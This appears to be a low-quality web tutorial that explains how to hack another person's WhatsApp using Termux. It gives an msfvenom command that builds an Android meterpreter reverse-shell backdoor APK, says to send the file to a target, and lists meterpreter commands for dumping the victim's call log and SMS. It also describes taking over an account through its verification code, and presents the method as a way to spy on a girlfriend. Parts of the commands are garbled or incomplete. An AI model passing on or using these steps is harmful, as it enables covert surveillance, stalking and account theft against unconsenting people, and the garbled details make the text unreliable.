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How To Hack WA via Termux 2024 Script Termux Hack WA

  1. Make sure your device or smartphone has at least Lollipop 5.0 or later, 32 or 64 bit and a higher operating system (OS).
  2. Download the termux app on the Google Play Store or visit the official website address on
  3. Then view your IP address by typing ifconfig in the Termux app.
  4. Then write this termux script by hack wa 2024: msfvenom -p android/meterpreter/reverse_tcp LHOST = LPORT=4444 R >hack.apk>
  5. LHOST in the sentence with your IPaddress shown in the first step.
  6. Open the File menu >> Home > >hack.apk to see the finished backdoor file.
  7. Well, the next step is to send the backdoorfile to your target, both via Messenger, WhatsAppand others.
  8. When the target successfully installs the apk file you sent, it means you can view or tap the target’s WhatsApp account.

So how can we see the results of our hacking work? see the following reviews.

  • To view the destination’s call history, type dump_callog
  • To view the message history of the target WhatsApp account, type dump-sms.

Here’s how to hack whatsapp account with this termux script without borrowing target smartphone, isn’t it easy?

Read also How to hack Whatsapp via Cmd

how to hack wa without touching the victim's cell phone
How to hack someone WhatsApp with Termux Simplest

How to hack WA without Termux

But my smartphone is not yet eligible to install the Temux app! Don’t worry, if you encounter this problem, you can also hack someone’s WhatsApp account without any additional apps.

If you want to use a hack app other than termux, can you read this 22 WA Hack APK please.

So how do you do it? just scroll down to see the steps.

  1. The first step is to make sure the WhatsApp app on your smartphone is the latest version.
  2. To start hacking, first find out the target’s mobile number and email address.
  3. Access the WhatsApp application with the target smartphone number.
  4. Run system setup.
  5. Now here the application will send a confirmation code to the registered number.
  6. And at this point you should be able to hack the target WhatsApp account.

Read also How to hack WhatsApp without verification

Here is how to hack a girlfriend with wa hack app without touching the victim’s cell phone termux 2024, use this method wisely so as not to damage some parts.

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